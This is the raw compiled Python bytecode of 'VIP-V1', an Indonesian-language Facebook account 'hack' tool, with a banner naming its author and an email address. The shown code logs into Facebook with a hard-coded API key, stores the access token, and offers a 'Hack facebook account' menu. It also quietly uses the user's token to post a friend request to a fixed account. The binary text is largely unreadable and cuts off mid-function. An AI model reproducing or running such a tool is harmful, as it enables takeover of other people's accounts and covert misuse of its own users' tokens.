\xe2\x97\x8f\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe0\xb9\x91\xdb\xa9\xdb\xa9\xe0\xb9\x91\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x96\xac\xe2\x97\x8f\n\x1b[1;96m\xe2\x96\x88. 
_-_-- -_ -- RECODE : RandiSr\n\x1b[1;96m\xe2\x96\x88 \xe2\x96\xb2\xe2\x96\xb2\xe2\x96\xb2\xe2\x96\xb2\xe2\x96\xb2 -_ -\xc2\xab============\xe2\x9c\xa7==========\xc2\xbb\n\x1b[1;96m\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88 SUBSCRIBE NOW TO MY CHANNELL ...!!\n\x1b[1;96m \xe2\x96\x88\xe2\x96\x88 \xe2\x96\x88\xe2\x96\x88 VIP-V1 by RandiSr \n\x1b[1;93m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\x1b[1;93m\xe2\x95\x91\x1b[1;96m\xc2\xa4 \x1b[1;93mAuthor \x1b[1;93m: \x1b[1;93mMr.NEWBIE3X \x1b[1;93m \xe2\x95\x91\n\x1b[1;93m\xe2\x95\x91\x1b[1;96m\xc2\xa4 \x1b[1;93mKontak \x1b[1;93m: \x1b[1;93m\x1b[4m081290587***\x1b[0m \x1b[1;93m \xe2\x95\x91\n\x1b[1;93m\xe2\x95\x91\x1b[1;96m\xc2\xa4 \x1b[1;93mEmail \x1b[1;93m : \x1b[1;93m\x1b[4mRandisahrulr@gmail.com\x1b[0m \x1b[1;93m 
\xe2\x95\x91\n\x1b[1;93m\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d\nc\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sF\x00\x00\x00d\x01\x00d\x02\x00d\x03\x00g\x03\x00}\x00\x00x0\x00|\x00\x00D](\x00}\x01\x00d\x04\x00|\x01\x00\x17Gt\x00\x00j\x01\x00j\x02\x00\x83\x00\x00\x01t\x03\x00j\x04\x00d\x05\x00\x83\x01\x00\x01q\x16\x00Wd\x00\x00S(\x06\x00\x00\x00Ns\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x07\x00\x00\x00...... s,\x00\x00\x00\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mTunggu sebentar \x1b[1;97mi\x01\x00\x00\x00(\x05\x00\x00\x00R\x06\x00\x00\x00R\x18\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00(\x02\x00\x00\x00t\x05\x00\x00\x00titikt\x01\x00\x00\x00o(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x03\x00\x00\x00tikL\x00\x00\x00s\n\x00\x00\x00\x00\x01\x0f\x01\r\x01\x08\x00\r\x00i\x00\x00\x00\x00s\r\x00\x00\x00\x1b[31mNot Vulns\t\x00\x00\x00\x1b[32mVulnt\t\x00\x00\x00randioloyt\x08\x00\x00\x0016122003c\x00\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\'\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y 
\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00t\x04\x00\x83\x00\x00\x01Wn\xf3\x00\x04t\x05\x00t\x06\x00f\x02\x00k\n\x00r"\x01\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x07\x00GHt\x08\x00j\t\x00d\x04\x00\x83\x01\x00\x01d\x05\x00GHt\x08\x00j\t\x00d\x06\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x07\x00\x83\x01\x00\x01d\x08\x00GHt\x08\x00j\t\x00d\t\x00\x83\x01\x00\x01d\n\x00GHt\n\x00d\x0b\x00\x83\x01\x00}\x01\x00|\x01\x00t\x0b\x00k\x02\x00r\t\x01t\n\x00d\x0c\x00\x83\x01\x00}\x02\x00|\x02\x00t\x0c\x00k\x02\x00r\xe3\x00d\r\x00GHt\n\x00d\x0e\x00\x83\x01\x00}\x03\x00t\r\x00\x83\x00\x00\x01q\x1f\x01d\x0f\x00GHt\n\x00d\x10\x00\x83\x01\x00\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01q#\x01d\x11\x00GHt\n\x00d\x12\x00\x83\x01\x00\x01t\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x13\x00\x00\x00Nt\x05\x00\x00\x00resets\x07\x00\x00\x00mew.txtt\x01\x00\x00\x00ri\x01\x00\x00\x00s*\x00\x00\x00Biasanya yg gak subscribe tidak bisa logini\x03\x00\x00\x00sB\x00\x00\x00xdg-open https://www.youtube.com/channel/UCbZ45S0QGbo5IAaItt-mBlA s\x1d\x00\x00\x00User dan Password Kontak me;)i\x05\x00\x00\x00s\x1b\x00\x00\x00Masukan User dan Pass nya ?s,\x00\x00\x00\n\x1b[32;1m[\x1b[33;1m#\x1b[32;1m]\x1b[37;1m Username : s+\x00\x00\x00\x1b[32;1m[\x1b[33;1m#\x1b[32;1m]\x1b[37;1m Password : s.\x00\x00\x00\x1b[32;1m[\x1b[32;1m+\x1b[32;1m]\x1b[37;1m login Berhasils8\x00\x00\x00\x1b[32;1m[\x1b[31;1m+\x1b[32;1m]\x1b[37;1m Press Enter to continue sB\x00\x00\x00\x1b[32;1m[\x1b[31;1m-\x1b[32;1m]\x1b[37;1m Password \x1b[31;1mlicensi anda salahs5\x00\x00\x00\x1b[32;1m[\x1b[31;1m+\x1b[32;1m]\x1b[37;1m You Must Enter Again s5\x00\x00\x00\x1b[32;1m[\x1b[31;1m-\x1b[32;1m]\x1b[37;1m Username \x1b[31;1mSalahs6\x00\x00\x00\x1b[32;1m[\x1b[31;1m+\x1b[32;1m]\x1b[37;1m You Must Enter Again 
(\x0f\x00\x00\x00R\x05\x00\x00\x00t\x06\x00\x00\x00systemt\x04\x00\x00\x00opent\x04\x00\x00\x00readt\x04\x00\x00\x00menut\x08\x00\x00\x00KeyErrort\x07\x00\x00\x00IOErrort\x04\x00\x00\x00logoR\x1c\x00\x00\x00R\x1d\x00\x00\x00t\t\x00\x00\x00raw_inputt\x04\x00\x00\x00namet\x04\x00\x00\x00pawst\x05\x00\x00\x00logint\x02\x00\x00\x00an(\x04\x00\x00\x00t\x05\x00\x00\x00tokett\x05\x00\x00\x00unamet\x03\x00\x00\x00pwdt\x03\x00\x00\x00cek(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R3\x00\x00\x00k\x00\x00\x00s8\x00\x00\x00\x00\x01\r\x01\x03\x01\x15\x01\x0b\x01\x13\x01\r\x01\x05\x01\r\x01\x05\x01\r\x01\r\x01\x05\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x05\x01\x0c\x01\n\x02\x05\x01\n\x01\r\x01\n\x02\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x9f\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHd\x05\x00GHt\x03\x00d\x06\x00\x83\x01\x00}\x00\x00|\x00\x00d\x07\x00k\x02\x00rM\x00d\x08\x00GHt\x04\x00\x83\x00\x00\x01nN\x00|\x00\x00d\t\x00k\x02\x00rc\x00t\x05\x00\x83\x00\x00\x01n8\x00|\x00\x00d\n\x00k\x02\x00ry\x00t\x06\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x0b\x00k\x02\x00r\x8f\x00t\x04\x00\x83\x00\x00\x01n\x0c\x00d\x08\x00GHt\x04\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00NR&\x00\x00\x00s+\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Logins7\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Login using tokens*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Exits\n\x00\x00\x00\x1b[1;97m\xe2\x95\x91s\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] 
Wrong inputt\x01\x00\x00\x001t\x01\x00\x00\x002t\x01\x00\x00\x000(\x07\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\x08\x00\x00\x00R2\x00\x00\x00t\x06\x00\x00\x00tokenz(\x01\x00\x00\x00t\x04\x00\x00\x00msuk(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x05\x00\x00\x00masuk\x8c\x00\x00\x00s$\x00\x00\x00\x00\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xb7\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x1a\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00}\x00\x00t\x03\x00\x83\x00\x00\x01Wn\x89\x02\x04t\x04\x00t\x05\x00f\x02\x00k\n\x00r\xb2\x02\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x06\x00GHt\x07\x00d\x04\x00\x83\x01\x00}\x01\x00t\x08\x00j\x08\x00d\x05\x00\x83\x01\x00}\x02\x00t\t\x00\x83\x00\x00\x01y\x11\x00t\n\x00j\x02\x00d\x06\x00\x83\x01\x00\x01Wn \x00\x04t\x0b\x00j\x0c\x00k\n\x00r\xa4\x00\x01\x01\x01d\x07\x00GHt\r\x00\x83\x00\x00\x01n\x01\x00Xt\x0e\x00t\n\x00j\x0f\x00_\x10\x00t\n\x00j\x11\x00d\x08\x00d\t\x00\x83\x00\x01\x01|\x01\x00t\n\x00j\x12\x00d\n\x00<|\x02\x00t\n\x00j\x12\x00d\x0b\x00<t\n\x00j\x13\x00\x83\x00\x00\x01t\n\x00j\x14\x00\x83\x00\x00}\x03\x00d\x0c\x00|\x03\x00k\x06\x00rT\x02y.\x01d\r\x00|\x01\x00\x17d\x0e\x00\x17|\x02\x00\x17d\x0f\x00\x17}\x04\x00i\x0b\x00d\x10\x00d\x11\x006d\x12\x00d\x13\x006|\x01\x00d\n\x006d\x14\x00d\x15\x006d\x16\x00d\x17\x006d\x16\x00d\x18\x006d\x19\x00d\x1a\x006d\x1b\x00d\x1c\x006|\x02\x00d\x12\x006d\x1d\x00d\x1e\x006d\x1f\x00d 
\x006}\x05\x00t\x15\x00j\x16\x00d!\x00\x83\x01\x00}\x06\x00|\x06\x00j\x17\x00|\x04\x00\x83\x01\x00\x01|\x06\x00j\x18\x00\x83\x00\x00}\x07\x00|\x05\x00j\x17\x00i\x01\x00|\x07\x00d"\x006\x83\x01\x00\x01d#\x00}\x03\x00t\x19\x00j\x1a\x00|\x03\x00d$\x00|\x05\x00\x83\x01\x01}\x08\x00t\x1b\x00j\x1c\x00|\x08\x00j\x1d\x00\x83\x01\x00}\t\x00t\x02\x00d\x02\x00d%\x00\x83\x02\x00}\n\x00|\n\x00j\x1e\x00|\t\x00d&\x00\x19\x83\x01\x00\x01|\n\x00j\x1f\x00\x83\x00\x00\x01d\'\x00GHt\x19\x00j \x00d(\x00|\t\x00d&\x00\x19\x17\x83\x01\x00\x01t\x00\x00j\x01\x00d)\x00\x83\x01\x00\x01t\x03\x00\x83\x00\x00\x01WqT\x02\x04t\x19\x00j!\x00j"\x00k\n\x00rP\x02\x01\x01\x01d\x07\x00GHt\r\x00\x83\x00\x00\x01qT\x02Xn\x00\x00d*\x00|\x03\x00k\x06\x00r\x89\x02d+\x00GHt\x00\x00j\x01\x00d,\x00\x83\x01\x00\x01t#\x00j$\x00d-\x00\x83\x01\x00\x01t\r\x00\x83\x00\x00\x01q\xb3\x02d.\x00GHt\x00\x00j\x01\x00d,\x00\x83\x01\x00\x01t#\x00j$\x00d-\x00\x83\x01\x00\x01t%\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(/\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s@\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mID\x1b[1;97m|\x1b[1;96mEmail\x1b[1;97m \x1b[1;91m:\x1b[1;92m s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m s\x16\x00\x00\x00https://m.facebook.coms\x19\x00\x00\x00\n\x1b[1;91m[!] 
No connectiont\x02\x00\x00\x00nri\x00\x00\x00\x00t\x05\x00\x00\x00emailt\x04\x00\x00\x00passs\x0b\x00\x00\x00save-devicesG\x00\x00\x00api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=s`\x00\x00\x00format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=s;\x00\x00\x00return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32t \x00\x00\x00882a8490361da98702bf97a021ddc14dt\x07\x00\x00\x00api_keyt\x08\x00\x00\x00passwordt\x10\x00\x00\x00credentials_typet\x04\x00\x00\x00JSONt\x06\x00\x00\x00formatR8\x00\x00\x00t\x13\x00\x00\x00generate_machine_idt\x18\x00\x00\x00generate_session_cookiest\x05\x00\x00\x00en_USt\x06\x00\x00\x00locales\n\x00\x00\x00auth.logint\x06\x00\x00\x00methodR:\x00\x00\x00t\x14\x00\x00\x00return_ssl_resourcess\x03\x00\x00\x001.0t\x01\x00\x00\x00vt\x03\x00\x00\x00md5t\x03\x00\x00\x00sigs\'\x00\x00\x00https://api.facebook.com/restserver.phpt\x06\x00\x00\x00paramsR\x11\x00\x00\x00t\x0c\x00\x00\x00access_tokens5\x00\x00\x00\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin successfullysM\x00\x00\x00https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=R\n\x00\x00\x00t\n\x00\x00\x00checkpoints%\x00\x00\x00\n\x1b[1;91m[!] \x1b[1;93mAccount Checkpoints\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s\x18\x00\x00\x00\n\x1b[1;91m[!] 
Login Failed(&\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R+\x00\x00\x00R,\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00t\x07\x00\x00\x00getpassR#\x00\x00\x00t\x02\x00\x00\x00brt\t\x00\x00\x00mechanizet\x08\x00\x00\x00URLErrorR\x08\x00\x00\x00t\x04\x00\x00\x00Truet\x08\x00\x00\x00_factoryt\x07\x00\x00\x00is_htmlt\x0b\x00\x00\x00select_formt\x04\x00\x00\x00formt\x06\x00\x00\x00submitt\x06\x00\x00\x00geturlt\x07\x00\x00\x00hashlibt\x03\x00\x00\x00newt\x06\x00\x00\x00updatet\t\x00\x00\x00hexdigestt\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x04\x00\x00\x00jsont\x05\x00\x00\x00loadst\x04\x00\x00\x00textR\x19\x00\x00\x00t\x05\x00\x00\x00closet\x04\x00\x00\x00postt\n\x00\x00\x00exceptionsR\x01\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00(\x0b\x00\x00\x00R4\x00\x00\x00t\x02\x00\x00\x00idR6\x00\x00\x00t\x03\x00\x00\x00urlRO\x00\x00\x00t\x04\x00\x00\x00dataR\x10\x00\x00\x00t\x01\x00\x00\x00aR\'\x00\x00\x00R\x1e\x00\x00\x00t\x04\x00\x00\x00zedd(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R2\x00\x00\x00\xa3\x00\x00\x00sf\x00\x00\x00\x00\x01\r\x01\x03\x01\x0f\x01\x0b\x01\x13\x01\r\x01\x05\x01\x0c\x01\x0f\x01\x07\x01\x03\x01\x11\x01\x10\x01\x05\x01\x0b\x01\x0c\x01\x10\x01\r\x01\r\x01\n\x01\x0c\x01\x0c\x01\x03\x01\x16\x01S\x01\x0f\x01\r\x01\x0c\x01\x14\x01\x06\x01\x15\x01\x12\x01\x0f\x01\x11\x01\n\x01\x05\x01\x15\x01\r\x01\x0b\x01\x13\x01\x05\x01\x0e\x01\x0c\x01\x05\x01\r\x01\r\x01\n\x02\x05\x01\r\x01\r\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xda\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x02\x00GHt\x03\x00d\x02\x00\x83\x01\x00}\x00\x00y`\x00t\x04\x00j\x05\x00d\x03\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\x06\x00j\x07\x00|\x01\x00j\x08\x00\x83\x01\x00}\x02\x00|\x02\x00d\x04\x00\x19}\x03\x00t\t\x00d\x05\x00d\x06\x00\x83\x02\x00}\x04\x00|\x04\x00j\n\x00|\x00\x00\x83\x01\x00\x01|\x04\x00j\x0b\x00\x83\x00\x00\x01t\x0c\x00\x83\x00\x00\x01WnU\x00\x04t\r\x00k\n\x00r\xd5\x00\x01\x01\x01d\x07\x00GHt\x03\x
00d\x08\x00\x83\x01\x00}\x05\x00|\x05\x00d\t\x00k\x02\x00r\xb5\x00t\x0e\x00\x83\x00\x00\x01q\xd6\x00|\x05\x00d\n\x00k\x02\x00r\xcb\x00t\x0f\x00\x83\x00\x00\x01q\xd6\x00t\x0e\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x0b\x00\x00\x00NR&\x00\x00\x00s(\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mToken\x1b[1;91m : \x1b[1;97ms+\x00\x00\x00https://graph.facebook.com/me?access_token=R0\x00\x00\x00s\t\x00\x00\x00login.txtR\x11\x00\x00\x00s\x10\x00\x00\x00\x1b[1;91m[!] Wrongs6\x00\x00\x00\x1b[1;91m[?] \x1b[1;92mWant to pick up token?\x1b[1;97m[y/n]: R\n\x00\x00\x00t\x01\x00\x00\x00y(\x10\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R)\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00R+\x00\x00\x00R,\x00\x00\x00R\x08\x00\x00\x00R2\x00\x00\x00(\x06\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00otwRm\x00\x00\x00t\x04\x00\x00\x00namaRn\x00\x00\x00R\x1f\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R;\x00\x00\x00\xda\x00\x00\x00s&\x00\x00\x00\x00\x01\r\x01\x05\x01\x0c\x01\x03\x01\x13\x01\x12\x01\n\x01\x0f\x01\r\x01\n\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\n\x02c\x00\x00\x00\x00\x05\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sc\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00WnD\x00\x04t\x04\x00k\n\x00rl\x00\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xy=\x00t\x08\x00j\t\x00d\x07\x00|\x00\x00\x17\x83\x01\x00}\x01\x00t\n\x00j\x0b\x00|\x01\x00j\x0c\x00\x83\x01\x00}\x02\x00|\x02\x00d\x08\x00\x19}\x03\x00|\x02\x00d\t\x00\x19}\x04\x00Wnf\x00\x04t\r\x00k\n\x00r\xf0\x00\x01\x01\x01t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01d\n\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n#\x00\x04t\x08\x00j\x
0e\x00j\x0f\x00k\n\x00r\x12\x01\x01\x01\x01d\x0b\x00GHt\x10\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x11\x00GHd\x0c\x00|\x03\x00\x17d\r\x00\x17GHd\x0e\x00d\x0f\x00d\x10\x00\x14\x17GHd\x11\x00GHd\x12\x00GHd\x13\x00GHd\x14\x00GHd\x15\x00GHt\x12\x00\x83\x00\x00\x01d\x00\x00S(\x16\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s+\x00\x00\x00https://graph.facebook.com/me?access_token=R0\x00\x00\x00Rj\x00\x00\x00s$\x00\x00\x00\x1b[1;91m[!] \x1b[1;93mAccount Checkpoints\x18\x00\x00\x00\x1b[1;91m[!] No connections:\x00\x00\x00\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92ms\x07\x00\x00\x00\x1b[1;97ms\n\x00\x00\x00\x1b[1;97m\xe2\x95\x9ai(\x00\x00\x00s\x03\x00\x00\x00\xe2\x95\x90s\x14\x00\x00\x001]. User informations(\x00\x00\x002]. Hack facebook account s\x19\x00\x00\x003]. Show token s\x16\x00\x00\x004]. LogOut s\x1f\x00\x00\x005]. 
Exit the programs (\x13\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00R\x08\x00\x00\x00R.\x00\x00\x00t\x05\x00\x00\x00pilih(\x05\x00\x00\x00R4\x00\x00\x00Rp\x00\x00\x00Rm\x00\x00\x00Rq\x00\x00\x00Rj\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R+\x00\x00\x00\xf1\x00\x00\x00sB\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x13\x01\x12\x01\n\x01\x0e\x01\r\x01\r\x01\x05\x01\r\x01\r\x01\n\x01\x13\x01\x05\x01\x0b\x01\r\x01\x05\x01\r\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00s\xf9\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xce\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\xb8\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01n\xa2\x00|\x00\x00d\x06\x00k\x02\x00r\xa3\x00t\x04\x00j\x05\x00d\x07\x00\x83\x01\x00\x01t\x06\x00GHt\x07\x00d\x08\x00d\t\x00\x83\x02\x00j\x08\x00\x83\x00\x00}\x01\x00d\n\x00|\x01\x00\x17GHt\x00\x00d\x0b\x00\x83\x01\x00\x01t\t\x00\x83\x00\x00\x01nR\x00|\x00\x00d\x0c\x00k\x02\x00r\xd3\x00t\x04\x00j\x05\x00d\r\x00\x83\x01\x00\x01t\x04\x00j\x05\x00d\x0e\x00\x83\x01\x00\x01t\n\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x0f\x00k\x02\x00r\xe9\x00t\n\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] 
Wrong inputR8\x00\x00\x00R9\x00\x00\x00t\x01\x00\x00\x003R&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s-\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mYour token\x1b[1;91m :\x1b[1;97m s\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]t\x01\x00\x00\x004s\x10\x00\x00\x00rm -rf login.txtsA\x00\x00\x00xdg-open https://www.youtube.com/channel/UCbZ45S0QGbo5IAaItt-mBlAR:\x00\x00\x00(\x0b\x00\x00\x00R/\x00\x00\x00Rr\x00\x00\x00t\t\x00\x00\x00informasit\t\x00\x00\x00menu_hackR\x05\x00\x00\x00R(\x00\x00\x00R.\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R+\x00\x00\x00R\x08\x00\x00\x00(\x02\x00\x00\x00Rn\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>Rr\x00\x00\x00\x14\x01\x00\x00s.\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\r\x01\x05\x01\x15\x01\t\x01\n\x01\n\x01\x0c\x01\r\x01\r\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s\xaa\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\n\x00d\x08\x00\x83\x01\x00\x01t\x0b\x00j\x0c\x00d\t\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\r\x00j\x0e\x00|\x02\x00j\x0f\x00\x83\x01\x00}\x03\x00x\xf6\x01|\x03\x00d\n\x00\x19D]\xd4\x01}\x04\x00|\x01\x00|\x04\x00d\x0b\x00\x19k\x06\x00s\xde\x00|\x01\x00|\x04\x00d\x0c\x00\x19k\x06\x00r\xb8\x00t\x0b\x00j\x0c\x00d\r\x00|\x04\x00d\x0c\x00\x19\x17d\x0e\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\r\x00j\x0e\x00|\x05\x00j\x0f\x